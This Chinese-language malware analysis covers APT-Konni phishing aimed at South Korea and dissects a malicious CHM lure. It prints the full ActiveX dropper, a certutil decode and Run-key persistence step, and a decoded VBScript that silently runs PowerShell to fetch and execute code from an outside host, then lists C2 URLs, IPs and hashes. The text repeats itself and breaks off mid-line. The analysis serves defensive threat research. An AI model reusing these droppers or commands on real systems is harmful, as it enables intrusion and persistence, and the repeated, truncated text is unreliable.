APT-Konni 组织针对韩国近期的攻击活动分析
Contents
前言
此文围绕常见的APT攻击手法来编写,高级持续性威胁(APT)攻击,以其隐蔽性和持久性,对企业和个人的信息安全构成了重大威胁。APT攻击者通常采用简单但高效的钓鱼文件手法,通过精心伪装的恶意文档和伪装成合法文件的钓鱼邮件,诱导目标用户点击后执行恶意代码,从而获取系统的访问权限。
近期刷推刷到有关APT-Konni组织和一个新组织(SUSU)的攻击活动,攻击样本中几乎都是韩语,Konni组织在近年也是被公开针对韩国企业进行攻击,根据某些情报是与APT37组织有关,而这个SUSU组织是近期才冒出来的,所以组织归属未知,攻击手法都是相似。
OK,然后了你会在此文了解到APT-Konni的钓鱼手法,已经一些攻击流程,使用什么类型的文件进行钓鱼,又使用什么方式来收集系统信息等...。
诱饵一:pc9.chm
Chm文件-静态分析,文件头检查:使用十六进制编辑器查看文件头,确认是否为合法的 CHM 文件。如果是CHM文件的通常会是ITSF,这是CHM文件格式的标志。如果文件头没有这个标志,文件可能不是合法的CHM文件。这里恶意CHM文件中的文件头仍然以ITSF
开头,是因为攻击者利用CHM文件格式作为传播恶意软件的载体。ITSF
标志是CHM文件格式的标准标志,合法的CHM文件也以此开头。所以这个恶意CHM文件为了绕过基本的文件格式检查,达到一些逃避的动作,看起来像一个合法的CHM文件。除非是一些动作比较大的改动Chm文件,可能会变为其它标头,具体根据实际情况判断。
CHM 文件(Compiled HTML Help 文件)是一个可以解压的文件,这是因为 CHM 文件实际上是一个容器,包含了一组 HTML 文件、图像、脚本和其他资源。这些资源被编译和压缩在一起,以便于分发和使用,解压 CHM 文件:CHM 文件实际上是一个压缩包,可以使用工具如7zip将其解压缩,查看其中的内容。
CHM 恶意文件中需要进行 HTML 文件检查,主要是因为 HTML 文件是 CHM 文件的核心内容之一,且 HTML 文件可以包含各种恶意代码,如 JavaScript、VBScript 和 ActiveX 控件等,这些代码可能会在用户打开 CHM 文件时执行,从而实现攻击者行为目的。
在上面截图中可以看到ActiveX 控件中一段代码,在对象元素<OBJECT>
和一个脚本标签<script>
,其目的是利用 ActiveX 控件执行命令。并且使用<OBJECT>
元素,该元素使用了classid="clsid: 52a2aaae-085d-4187-97ea-8c30db990436"
来加载一个特定的 ActiveX 控件。
<OBJECT id=click classid="clsid: 52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap:shortcut"> <PARAM name="Item1" value=', cmd, /c echo U3ViIFdNUHJvYyhwX2NtZCkNCg1zZXQgd20gPSBHZXRPYmplY3QoIndpbm1nbXRzOndpbjMyX3Byb2Nlc3MiKQ0KCXN1dCBvd3MgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxyb290XGNpbXYyIikNCglzZXQgb3N0ID0gb3dzLkdldCgiV2luMzJfUHJvY2Vzc1N0YXJ0dXAiKQ0KCXN1dCBvY29uZiA9IG9zdC5TcGF3bkluc3RhbmNlXw0KCW9jb25mLlNob3dXaW5kb3cgPSAxMg0KCWVyclJldHVybiA9IHdtLkNyZWF0ZShwX2NtZCwgTnVsbCwgb2NvbmYsIHBpZCkNCkVuZCBTdWINCg0KdXJsID0gImh0dHA6Ly8zMjk4NC5jbmIzOS5jb20vY29kZS8iDQp1cmkgPSAiaHR0cDovL2FzZGxma2ouYXNkb2ZqaS5ldi9TbXRJbmZvIg0KcG93X2NtZCA9ICJjbWQgL2MgcG93ZXJzaGVsbCAtY29tbWFuZCAiImlleCAod2dldCB4eHgvZGVtby50eHQpLmNvbnRlbnQ7IEluZm9LZXkgLXVyICd4eHgnIiIiDQpwb3dfY21kID0gUmVwbGFjZShwb3dfY21kLCAieHh4IiwgdXJpKQ0KV01Qcm9jKHBvd19jbWQp > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.vbs" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG SZ /d "%USERPROFILE%\Links\Document.vbs" /f'> <PARAM name="Item2" value="273,1,1"> </OBJECT>
<PARAM>
元素为这个 ActiveX 控件提供了多个参数。其中name="Item1"
的value
是一个被 Base64 编码的命令,我们将编码内容进行解码。
Sub WMProc(p_cmd) set wm = GetObject("winmgmts:win32_process") sut ows = GetObject("winmgmts:\root\cimv2") set ost = ows.Get("Win32_ProcessStartup") sut oconf = ost.SpawnInstance_ oconf.ShowWindow = 12 errReturn = wm.Create(p_cmd, Null, oconf, pid) End Sub url = "http://32984.cnb39.com/code/" uri = "http://asdlfkj.asdofji.ev/SmtInfo" pow_cmd = "cmd /c powershell -command ""iex (wget xxx/demo.txt).content; InfoKey -ur 'xxx'""" pow_cmd = Replace(pow_cmd, "xxx", uri) WMProc(pow_cmd)
对象获取:在上面的代码块中,可以发现到了窗口隐藏启动的动作,代码使用GetObject
函数获取了WMI服务对象,并设置了进程启动的配置(Win32_ProcessStartup
),其中ShowWindow = 12
表示隐藏窗口启动。
set wm = GetObject("winmgmts:win32_process") sut ows = GetObject("winmgmts:\root\cimv2") set ost = ows.Get("Win32_ProcessStartup") sut …
此文围绕常见的APT攻击手法来编写,高级持续性威胁(APT)攻击,以其隐蔽性和持久性,对企业和个人的信息安全构成了重大威胁。APT攻击者通常采用简单但高效的钓鱼文件手法,通过精心伪装的恶意文档和伪装成合法文件的钓鱼邮件,诱导目标用户点击后执行恶意代码,从而获取系统的访问权限。
近期刷推刷到有关APT-Konni组织和一个新组织(SUSU)的攻击活动,攻击样本中几乎都是韩语,Konni组织在近年也是被公开针对韩国企业进行攻击,根据某些情报是与APT37组织有关,而这个SUSU组织是近期才冒出来的,所以组织归属未知,攻击手法都是相似。
OK,然后了你会在此文了解到APT-Konni的钓鱼手法,已经一些攻击流程,使用什么类型的文件进行钓鱼,又使用什么方式来收集系统信息等...。
诱饵一:pc9.chm
Chm文件-静态分析,文件头检查:使用十六进制编辑器查看文件头,确认是否为合法的 CHM 文件。如果是CHM文件的通常会是ITSF,这是CHM文件格式的标志。如果文件头没有这个标志,文件可能不是合法的CHM文件。这里恶意CHM文件中的文件头仍然以ITSF
开头,是因为攻击者利用CHM文件格式作为传播恶意软件的载体。ITSF
标志是CHM文件格式的标准标志,合法的CHM文件也以此开头。所以这个恶意CHM文件为了绕过基本的文件格式检查,达到一些逃避的动作,看起来像一个合法的CHM文件。除非是一些动作比较大的改动Chm文件,可能会变为其它标头,具体根据实际情况判断。
CHM 文件(Compiled HTML Help 文件)是一个可以解压的文件,这是因为 CHM 文件实际上是一个容器,包含了一组 HTML 文件、图像、脚本和其他资源。这些资源被编译和压缩在一起,以便于分发和使用,解压 CHM 文件:CHM 文件实际上是一个压缩包,可以使用工具如7zip将其解压缩,查看其中的内容。
CHM 恶意文件中需要进行 HTML 文件检查,主要是因为 HTML 文件是 CHM 文件的核心内容之一,且 HTML 文件可以包含各种恶意代码,如 JavaScript、VBScript 和 ActiveX 控件等,这些代码可能会在用户打开 CHM 文件时执行,从而实现攻击者行为目的。
在上面截图中可以看到ActiveX 控件中一段代码,在对象元素<OBJECT>
和一个脚本标签<script>
,其目的是利用 ActiveX 控件执行命令。并且使用<OBJECT>
元素,该元素使用了classid="clsid: 52a2aaae-085d-4187-97ea-8c30db990436"
来加载一个特定的 ActiveX 控件。
<OBJECT id=click classid="clsid: 52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap:shortcut"> <PARAM name="Item1" value=', cmd, /c echo U3ViIFdNUHJvYyhwX2NtZCkNCg1zZXQgd20gPSBHZXRPYmplY3QoIndpbm1nbXRzOndpbjMyX3Byb2Nlc3MiKQ0KCXN1dCBvd3MgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxyb290XGNpbXYyIikNCglzZXQgb3N0ID0gb3dzLkdldCgiV2luMzJfUHJvY2Vzc1N0YXJ0dXAiKQ0KCXN1dCBvY29uZiA9IG9zdC5TcGF3bkluc3RhbmNlXw0KCW9jb25mLlNob3dXaW5kb3cgPSAxMg0KCWVyclJldHVybiA9IHdtLkNyZWF0ZShwX2NtZCwgTnVsbCwgb2NvbmYsIHBpZCkNCkVuZCBTdWINCg0KdXJsID0gImh0dHA6Ly8zMjk4NC5jbmIzOS5jb20vY29kZS8iDQp1cmkgPSAiaHR0cDovL2FzZGxma2ouYXNkb2ZqaS5ldi9TbXRJbmZvIg0KcG93X2NtZCA9ICJjbWQgL2MgcG93ZXJzaGVsbCAtY29tbWFuZCAiImlleCAod2dldCB4eHgvZGVtby50eHQpLmNvbnRlbnQ7IEluZm9LZXkgLXVyICd4eHgnIiIiDQpwb3dfY21kID0gUmVwbGFjZShwb3dfY21kLCAieHh4IiwgdXJpKQ0KV01Qcm9jKHBvd19jbWQp > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.vbs" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG SZ /d "%USERPROFILE%\Links\Document.vbs" /f'> <PARAM name="Item2" value="273,1,1"> </OBJECT>
<PARAM>
元素为这个 ActiveX 控件提供了多个参数。其中name="Item1"
的value
是一个被 Base64 编码的命令,我们将编码内容进行解码。
Sub WMProc(p_cmd) set wm = GetObject("winmgmts:win32_process") sut ows = GetObject("winmgmts:\root\cimv2") set ost = ows.Get("Win32_ProcessStartup") sut oconf = ost.SpawnInstance_ oconf.ShowWindow = 12 errReturn = wm.Create(p_cmd, Null, oconf, pid) End Sub url = "http://32984.cnb39.com/code/" uri = "http://asdlfkj.asdofji.ev/SmtInfo" pow_cmd = "cmd /c powershell -command ""iex (wget xxx/demo.txt).content; InfoKey -ur 'xxx'""" pow_cmd = Replace(pow_cmd, "xxx", uri) WMProc(pow_cmd)
对象获取:在上面的代码块中,可以发现到了窗口隐藏启动的动作,代码使用GetObject
函数获取了WMI服务对象,并设置了进程启动的配置(Win32_ProcessStartup
),其中ShowWindow = 12
表示隐藏窗口启动。
set wm = GetObject("winmgmts:win32_process") sut ows = GetObject("winmgmts:\root\cimv2") set ost = ows.Get("Win32_ProcessStartup") sut …
IoC
http://settlores.com/get.php?638459689148682411=p8paUIDVaq1Z2c+v+3T3mQ==
http://settlores.com/list.php?638459689297099214=CAQJ9rrl89OcjIMVxsII2Ydg7cv1
http://settlores.com/get.php?638501171453885631=aNK/mSlBUdSlWF1SxFVkkw==
62.113.118.157
http://settlores.com/list.php?f=DESKTOP-26HIFVD.txt
http://settlores.com/upload.php
https://cavasa.com.co/login
http://settlores.com/list.php?638501172391230007=JJI04VaxIyPGHmEcN9Tv/AB5ewhJ
http://settlores.com/list.php?638459689874598023=xsCywy9MIdoxkhQsPE7OHfP02bPh
http://oryzanine.com/index.php?e27=qe6RRZjKjG&mIc=qxLRKcqlFa
https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super&za=mongo0
88b901dc2d5df59f54f02b248c24a4426796ded81ff06cd309d4c54c94a13df9
http://settlores.com/list.php?638459690385690692=TJd+RhDnPX1oQdY821ULR3no8Gm6
http://settlores.com/get.php?638459689133703321=dQz/v1LricbCI2qzRd38qw==
5.255.109.145
https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super&za=mongo1
http://32984.cnb39.com/code/
http://asdlfkj.asdofji.ev/SmtInfo
http://settlores.com/list.php?638459690454909301=AmmeR0mQWyhQYBAiLULzN9za3hGA
0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f
http://settlores.com/list.php?638459689228661846=vfulyS6Dwg9FBlSxmxwR7ZssFheN
http://settlores.com/list.php?638459689297099214=CAQJ9rrl89OcjIMVxsII2Ydg7cv1
http://settlores.com/get.php?638501171453885631=aNK/mSlBUdSlWF1SxFVkkw==
62.113.118.157
http://settlores.com/list.php?f=DESKTOP-26HIFVD.txt
http://settlores.com/upload.php
https://cavasa.com.co/login
http://settlores.com/list.php?638501172391230007=JJI04VaxIyPGHmEcN9Tv/AB5ewhJ
http://settlores.com/list.php?638459689874598023=xsCywy9MIdoxkhQsPE7OHfP02bPh
http://oryzanine.com/index.php?e27=qe6RRZjKjG&mIc=qxLRKcqlFa
https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super&za=mongo0
88b901dc2d5df59f54f02b248c24a4426796ded81ff06cd309d4c54c94a13df9
http://settlores.com/list.php?638459690385690692=TJd+RhDnPX1oQdY821ULR3no8Gm6
http://settlores.com/get.php?638459689133703321=dQz/v1LricbCI2qzRd38qw==
5.255.109.145
https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super&za=mongo1
http://32984.cnb39.com/code/
http://asdlfkj.asdofji.ev/SmtInfo
http://settlores.com/list.php?638459690454909301=AmmeR0mQWyhQYBAiLULzN9za3hGA
0aaec376904434197bae4f1a10ecfe8d4564d95fdfa8236ea960535710661c5f
http://settlores.com/list.php?638459689228661846=vfulyS6Dwg9FBlSxmxwR7ZssFheN